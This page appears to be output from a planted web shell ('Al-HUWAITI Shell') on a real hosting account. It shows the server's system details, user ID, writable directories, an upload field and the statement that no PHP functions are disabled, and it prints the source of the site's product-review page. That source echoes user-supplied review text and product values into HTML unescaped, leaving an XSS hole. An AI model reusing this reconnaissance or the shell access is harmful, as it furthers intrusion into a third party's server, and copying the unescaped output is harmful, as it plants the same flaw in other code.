Al-HUWAITI Shell
Al-huwaiti


Server : LiteSpeed
System : Linux us-phx-web1202.main-hosting.eu 4.18.0-553.84.1.lve.el8.x86_64 #1 SMP Tue Nov 25 18:33:03 UTC 2025 x86_64
User : u615232177 ( 615232177)
PHP Version : 8.1.33
Disable Function : NONE
Directory :  /home/u615232177/domains/sabrinaluxebraidedwigs.com/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/u615232177/domains/sabrinaluxebraidedwigs.com/public_html/review.php
<?php session_start();
$page_name = basename($_SERVER['PHP_SELF']); 
include("header.php"); ?>
<title><?php echo $company_name; ?> - Review A Product</title>
<?php $the_array = array();
if (isset($_GET['product'])){
	$product_id = mysqli_real_escape_string($con,$_GET['product']);
	$stmt = $con -> prepare('SELECT product_title FROM products WHERE product_id=?');
	$stmt -> bind_param('s',$product_id);
	$stmt -> execute(); 
	$stmt -> store_result(); 
	$stmt -> bind_result($product_title);
	$numrows = $stmt -> num_rows();
	if($numrows > 0){
	    while ($stmt -> fetch()) { 
            //make sure this person has bought the product before
            //get all these persons orders
            $completed = "Completed";
            $stmt_sure = $con -> prepare('SELECT order_id FROM my_orders WHERE user_id=? AND status=?');
            $stmt_sure -> bind_param('ss',$user_id,$completed);
            $stmt_sure -> execute(); 
            $stmt_sure -> store_result(); 
            $stmt_sure -> bind_result($order_id);
            $numrows_sure = $stmt_sure -> num_rows();
            if($numrows_sure > 0){
                while ($stmt_sure -> fetch()) { 
                    //check throught each order to see if this product is there
                    $stmt_or = $con -> prepare('SELECT product_id FROM cart_details WHERE order_id=?');
                    $stmt_or -> bind_param('s',$order_id);
                    $stmt_or -> execute(); 
                    $stmt_or -> store_result(); 
                    $stmt_or -> bind_result($product_id_db);
                    $numrows_or = $stmt_or -> num_rows();
                    if($numrows_or > 0){
                        while ($stmt_or -> fetch()) { 
                            if($product_id == $product_id_db){
                                array_push($the_array,"$product_id_db");  
                            }  
                        }
                    }
                }
            }
            else{
                //create a session to verify it's coming from here
                $_SESSION["action"] = "true";
                $message="You must have purchased this item before you can review it.";
                echo "<meta http-equiv=\"refresh\" content=\"0; url=failure.php?u=product_details.php?product=$product_id&m=$message\">";
                exit();
            }
        }
	}
    else{echo "<meta http-equiv=\"refresh\" content=\"0; url=index.php\">";exit();}
}
else{echo "<meta http-equiv=\"refresh\" content=\"0; url=index.php\">";exit();}

if (!in_array($product_id, $the_array)){
    //create a session to verify it's coming from here
    $_SESSION["action"] = "true";
    $message="You must have purchased this item before you can review it.";
    echo "<meta http-equiv=\"refresh\" content=\"0; url=failure.php?u=product_details.php?product=$product_id&m=$message\">";
    exit();
}
//check that they have not already dropped a review, in which case we populate the form and edit it accordingly.
$stmt_re = $con -> prepare('SELECT * FROM product_reviews WHERE product_id = ? AND user_id = ?');
$stmt_re -> bind_param('ss',$product_id,$user_id);
$stmt_re -> execute(); 
$stmt_re -> store_result();
$stmt_re -> bind_result($review_id,$review_product_id,$review_user_id,$review,$rating,$review_date); 
$numrows_re = $stmt_re -> num_rows();
if($numrows_re > 0){
    while ($stmt_re -> fetch()) { }
}
else{$rating = 0; $review = "";}

$msg='';$captcha_error=""; $errors=0;;
if (isset($_POST["send_review"])) {
	
if($errors == 0){
	
	$review = mysqli_real_escape_string($con,$_POST['review']);
	$rating = mysqli_real_escape_string($con,$_POST['rating']);
    $review_date = date('Y-m-d H:i:s');
	
	//check if we are inserting or updating
    $stmt_re = $con -> prepare('SELECT id FROM product_reviews WHERE product_id = ? AND user_id = ?');
    $stmt_re -> bind_param('ss',$product_id,$user_id);
    $stmt_re -> execute(); 
    $stmt_re -> store_result();
    $stmt_re -> bind_result($review_id); 
    $numrows_re = $stmt_re -> num_rows();
    if($numrows_re > 0){
        $stmt = $con -> prepare('UPDATE product_reviews SET review = ?,rating = ?, review_date = ? WHERE id = ?');
	    $stmt -> bind_param('sssi', $review,$rating,$review_date,$review_id);
	    $stmt -> execute();

        //create a session to verify it's coming from here
        $_SESSION["action"] = "true";
        $message="Your review was successfully edited.";
        echo "<meta http-equiv=\"refresh\" content=\"0; url=success.php?u=product_details.php?product=$product_id&m=$message\">";
    }
    else{
        $db_id=0;
        $stmt = $con -> prepare('INSERT INTO product_reviews VALUES (?,?,?,?,?,?)');
        $stmt -> bind_param('isssss',$db_id,$product_id,$user_id,$review,$rating,$review_date);
        $stmt -> execute();

        //create a session to verify it's coming from here
        $_SESSION["action"] = "true";
        $message="Your review was successfully added.";
        echo "<meta http-equiv=\"refresh\" content=\"0; url=success.php?u=product_details.php?product=$product_id&m=$message\">";

    }
}
}
?>

<!-- Title Page -->
	<section class="bg-title-page p-t-40 p-b-50 flex-col-c-m" style="background-image: url(images/banner-min.jpg);">
		<h2 class="l-text2 t-center">
		<div class='space_top'></div>
			Review A Product
		</h2>
	</section>

<br/>
<section class="bgwhite p-t-66 p-b-60">
		<div class="container">
			<div class="row">
				

				<div class="col-md-8">
					<form class="leave-comment" action="<?php echo htmlspecialchars($_SERVER["PHP_SELF"]);?>?product=<?php echo $product_id; ?>" method='post'>
					<h2>Review <?php echo $product_title; ?></h2>
						<p>Thank you for taking the time out to review our product. Please fill the form below:</p>
						<h4 class="">
							<?php echo"<br/>$msg";?>
						</h4>

						

						<div class="bo4 of-hidden size15 m-b-20">
							<select class="sizefull s-text7 p-l-22 p-r-22" name="rating"required>
								<option value="">Please Choose A Rating</option>
								<option value="5" <?php if($rating == "5"){echo"selected";} ?>>5 Stars (I love it!)</option>
								<option value="4" <?php if($rating == "4"){echo"selected";} ?>>4 Stars (I like it.)</option>
								<option value="3" <?php if($rating == "3"){echo"selected";} ?>>3 Stars (It was just okay).</option>
								<option value="2" <?php if($rating == "2"){echo"selected";} ?>>2 Stars (I did not like it.)</option>
								<option value="1" <?php if($rating == "1"){echo"selected";} ?>>1 Star (I really did not like it)</option>
                                       
							</select>
						</div>

						<textarea class="dis-block s-text7 size20 bo4 p-l-22 p-r-22 p-t-13 m-b-20" placeholder="Your Review (max 240 Characters)" name='review' required><?php echo $review ?></textarea>

						<div class="w-size25">
							<!-- Button -->
							<button name='send_review' type='submit' class="flex-c-m size2 bg1 bo-rad-23 hov1 m-text3 trans-0-4">
								Send
							</button>
						</div>
					</form>
					
				</div>
			</div>
		</div>
	</section>
<?php include("footer.php"); ?>

Al-HUWAITI Shell